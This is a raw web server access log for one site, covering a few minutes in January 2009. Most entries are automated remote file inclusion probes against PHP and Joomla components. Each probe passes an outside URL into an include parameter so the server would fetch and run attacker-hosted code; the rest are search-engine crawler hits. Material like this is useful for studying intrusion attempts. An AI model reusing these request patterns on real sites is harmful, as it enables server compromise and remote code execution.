87.101.4.49 - - [06/Jan/2009:08:21:20 -0800] "GET /logs/access_080723.log//?DOCUMENT_ROOT=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [06/Jan/2009:08:21:26 -0800] "GET /?DOCUMENT_ROOT=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 200 94805 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:08:21:43 -0800] "GET /logs/access_080819.log%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:21:46 -0800] "GET /logs/index.php?option=com_securityimages&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:21:47 -0800] "GET /index.php?option=com_securityimages&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95204 "-" "libwww-perl/5.810" "www.dmulk.com"
66.249.70.41 - - [06/Jan/2009:08:21:48 -0800] "GET /bikes/occcb/eBayISAPI.dll_files/ebay-nodefault-ns.css HTTP/1.1" 200 1419 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.41 - - [06/Jan/2009:08:21:48 -0800] "GET /bikes/occcb/eBayISAPI.dll_files/VI_Motors2_e5571us.css HTTP/1.1" 200 19001 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.41 - - [06/Jan/2009:08:21:48 -0800] "GET /bikes/occcb/eBayISAPI.dll_files/eBayISAPI.htm HTTP/1.1" 200 1202 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.41 - - [06/Jan/2009:08:21:48 -0800] "GET /bikes/occcb/eBayISAPI.dll_files/GlobalNavVjo23_Motors_e5576283730_en_US_AUTOS.css HTTP/1.1" 200 8083 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.41 - - [06/Jan/2009:08:21:48 -0800] "GET /bikes/occcb/eBayISAPI.dll_files/ebaybase_v4_e5511us.js HTTP/1.1" 200 48049 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.41 - - [06/Jan/2009:08:21:48 -0800] "GET /bikes/occcb/eBayISAPI.dll_files/GlobalNavVjo23_Motors_e5576283729_1_en_US_AUTOS.js HTTP/1.1" 200 68863 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
85.14.221.111 - - [06/Jan/2009:08:22:07 -0800] "GET /?path%5Bdocroot%5D=http://neu_2.lasrv-1.de/vwar/%20/.../%20/mraneti.txt??? HTTP/1.1" 200 94903 "-" "libwww-perl/5.803" "www.dmulk.com"
64.1.215.164 - - [06/Jan/2009:08:22:09 -0800] "GET /bikes/GPS/WeSTOC2008/?N=A HTTP/1.0" 200 842 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:22:26 -0800] "GET /logs/access_080724.log//mwchat/libs/errors.php?error=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:22:32 -0800] "GET /logs/access_080404.log//modules/My_eGallery/public/displayCategory.php?basepath=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.230.7 - - [06/Jan/2009:08:22:34 -0800] "GET /logs/access_081114.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.7 - - [06/Jan/2009:08:22:34 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.7 - - [06/Jan/2009:08:22:34 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.7 - - [06/Jan/2009:08:22:34 -0800] "GET /logs/access_081118.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:22:39 -0800] "GET /?path%5Bdocroot%5D=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 200 94754 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.170.176 - - [06/Jan/2009:08:22:45 -0800] "GET /messages.inc.php?include_path=http://turkglob.tu.funpic.org/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.170.176 - - [06/Jan/2009:08:22:46 -0800] "GET /logs/messages.inc.php?include_path=http://turkglob.tu.funpic.org/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.170.176 - - [06/Jan/2009:08:22:46 -0800] "GET /logs/access_080625.log/messages.inc.php?include_path=http://turkglob.tu.funpic.org/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.170.176 - - [06/Jan/2009:08:22:46 -0800] "GET /logs/access_080610.log/messages.inc.php?include_path=http://turkglob.tu.funpic.org/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:08:22:47 -0800] "GET /logs/access_081207.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:08:22:47 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:08:22:47 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:22:56 -0800] "GET /logs//mwchat/libs/errors.php?error=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:22:57 -0800] "GET /mwchat/libs/errors.php?error=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:23:11 -0800] "GET /logs//mwchat/libs/errors.php?error=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:23:11 -0800] "GET /logs//mwchat/libs/errors.php?error=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:23:11 -0800] "GET /mwchat/libs/errors.php?error=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:23:15 -0800] "GET /mwchat/libs/errors.php?error=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
85.214.79.241 - - [06/Jan/2009:08:23:20 -0800] "GET /logs/access_081108.log/errors.php?error=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:08:23:35 -0800] "GET /logs/access_081116.log/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:08:23:48 -0800] "GET /logs/access_081208.log//bbshop/shop/index.php?_shop_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:08:23:48 -0800] "GET /bbshop/shop/index.php?_shop_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:08:23:48 -0800] "GET /logs//bbshop/shop/index.php?_shop_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:23:53 -0800] "GET /logs/access_080714.log//mwchat/libs/errors.php?error=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.0.252.2 - - [06/Jan/2009:08:24:11 -0800] "GET /logs/access_080530.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:24:14 -0800] "GET /logs/access_080522.log/index.php?option=com_alphacontent&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:24:15 -0800] "GET /index.php?option=com_alphacontent&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95174 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:24:16 -0800] "GET /logs/index.php?option=com_alphacontent&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:08:24:18 -0800] "GET /logs/access_080404.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.49 - - [06/Jan/2009:08:24:25 -0800] "GET /logs//include/write.php?dir=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.239.227.49 - - [06/Jan/2009:08:24:25 -0800] "GET /include/write.php?dir=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
132.247.8.18 - - [06/Jan/2009:08:24:46 -0800] "GET /logs/access_081203.log//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://prwa-ct.org/calendar_events//tools/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:24:53 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.148.238.69 - - [06/Jan/2009:08:24:55 -0800] "GET /logs/access_080130.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rappelz.pzcci.org//media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:24:57 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:24:57 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:25:15 -0800] "GET /logs/access_080315.log/index.php?option=com_maxcomment&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:25:16 -0800] "GET /index.php?option=com_maxcomment&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95160 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:25:16 -0800] "GET /logs/index.php?option=com_maxcomment&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:08:25:20 -0800] "GET /logs/access_081206.log//bbshop/shop/index.php?_shop_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:25:20 -0800] "GET /logs/access_080805.log/index.php?option=com_linx&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:25:21 -0800] "GET /index.php?option=com_linx&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95134 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:25:22 -0800] "GET /logs/index.php?option=com_linx&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:25:22 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:25:22 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:25:23 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:08:25:45 -0800] "GET /logs/access_080819.log/head.php?adresa=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:08:25:45 -0800] "GET /head.php?adresa=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:08:25:45 -0800] "GET /logs/access_081003.log/head.php?adresa=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:08:25:45 -0800] "GET /logs/head.php?adresa=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.53.219.68 - - [06/Jan/2009:08:25:50 -0800] "GET /logs/access_081114.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.53.219.68 - - [06/Jan/2009:08:25:50 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.53.219.68 - - [06/Jan/2009:08:25:51 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:25:51 -0800] "GET /logs/access_081113.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:26:13 -0800] "GET /logs/access_081113.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:08:26:15 -0800] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:08:26:16 -0800] "GET /?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 200 94771 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:08:26:16 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 200 81177 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:08:26:16 -0800] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:08:26:16 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 200 81177 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:08:26:17 -0800] "GET /?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 200 94803 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:08:26:31 -0800] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:08:26:32 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 200 81177 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:08:26:32 -0800] "GET /?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 200 94819 "-" "Mozilla/5.0" "www.dmulk.com"
85.14.221.111 - - [06/Jan/2009:08:26:32 -0800] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://neu_2.lasrv-1.de/vwar/%20/.../%20/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.111 - - [06/Jan/2009:08:26:33 -0800] "GET /?path%5Bdocroot%5D=http://neu_2.lasrv-1.de/vwar/%20/.../%20/mraneti.txt??? HTTP/1.1" 200 94903 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.111 - - [06/Jan/2009:08:26:35 -0800] "GET /logs//?path%5Bdocroot%5D=http://neu_2.lasrv-1.de/vwar/%20/.../%20/mraneti.txt??? HTTP/1.1" 200 81177 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.136 - - [06/Jan/2009:08:26:38 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.136 - - [06/Jan/2009:08:26:38 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:26:38 -0800] "GET /logs//mwchat/libs/errors.php?error=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.136 - - [06/Jan/2009:08:26:39 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:26:39 -0800] "GET /mwchat/libs/errors.php?error=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:08:26:48 -0800] "GET /logs/access_080927.log//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:08:26:48 -0800] "GET /logs//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:08:26:48 -0800] "GET /classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:08:26:48 -0800] "GET /logs/access_081015.log//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:08:26:51 -0800] "GET /logs/access_080927.log//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:08:26:51 -0800] "GET /logs//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:08:26:51 -0800] "GET /classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:08:26:51 -0800] "GET /logs/access_081015.log//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
207.162.219.29 - - [06/Jan/2009:08:26:53 -0800] "GET /logs//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [06/Jan/2009:08:26:53 -0800] "GET /logs/access_081015.log//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [06/Jan/2009:08:26:55 -0800] "GET /classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [06/Jan/2009:08:26:56 -0800] "GET /logs/access_080927.log//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.136 - - [06/Jan/2009:08:27:08 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:27:22 -0800] "GET /logs/access_080228.log/index.php?option=com_alphacontent&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.11.230.7 - - [06/Jan/2009:08:27:24 -0800] "GET /logs/access_080928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.7 - - [06/Jan/2009:08:27:24 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.7 - - [06/Jan/2009:08:27:24 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:27:31 -0800] "GET /?path%5Bdocroot%5D=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 200 94761 "-" "libwww-perl/5.805" "www.dmulk.com"
85.14.221.111 - - [06/Jan/2009:08:27:38 -0800] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://neu_2.lasrv-1.de/vwar/%20/.../%20/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.53.219.68 - - [06/Jan/2009:08:27:41 -0800] "GET /logs/access_080928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.53.219.68 - - [06/Jan/2009:08:27:41 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.53.219.68 - - [06/Jan/2009:08:27:41 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:27:45 -0800] "GET /logs/access_080201.log/index.php?option=com_maxcomment&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:08:28:01 -0800] "GET /head.php?adresa=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:08:28:01 -0800] "GET /logs/access.log/head.php?adresa=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:08:28:01 -0800] "GET /logs/head.php?adresa=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
